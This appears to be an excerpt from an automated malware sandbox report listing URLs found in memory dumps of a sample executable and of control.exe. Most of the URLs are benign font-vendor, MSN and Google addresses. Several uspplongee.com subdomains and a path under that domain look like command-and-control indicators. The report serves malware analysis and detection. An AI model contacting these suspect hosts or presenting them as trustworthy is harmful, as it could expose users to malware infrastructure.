Source: iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comsivao
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comtoedK
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251839011.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251710288.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251678493.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comueo
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn.
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn5
Source: iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: iuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: iuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.html
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249550634.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/2
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/:
Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/U
Source: iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/X:
Source: iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0(
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ana
Source: iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/n
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/o
Source: iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: iuvRyl9i7D.exe, 00000000.00000003.249572897.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249496103.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249374645.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249531399.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249615233.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249355892.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249593017.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249472996.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249550634.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/xQ
Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/y
Source: iuvRyl9i7D.exe, 00000000.00000003.256184309.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.monotype.
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp4
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: control.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.uspplongee.com
Source: control.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.uspplongee.com/n6g4/
Source: iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn)
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xingsen.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://yihen.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://yousu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://zhanzen.uspplongee.com/
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo
